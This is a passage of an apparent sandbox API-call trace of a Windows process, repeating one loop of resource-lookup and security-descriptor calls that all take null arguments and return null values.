lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.111] FreeResource (hResData=0x0) returned 0 [0070.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.111] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.112] LockResource (hResData=0x0) returned 0x0 [0070.112] FreeResource (hResData=0x0) returned 0 [0070.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.113] LockResource (hResData=0x0) returned 0x0 [0070.113] FreeResource (hResData=0x0) returned 0 [0070.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.114] LockResource (hResData=0x0) returned 0x0 [0070.114] FreeResource (hResData=0x0) returned 0 [0070.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.115] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.115] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.115] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.115] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.115] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.115] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.115] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.115] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.115] LockResource (hResData=0x0) returned 0x0 [0070.115] FreeResource (hResData=0x0) returned 0 [0070.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.115] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.115] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 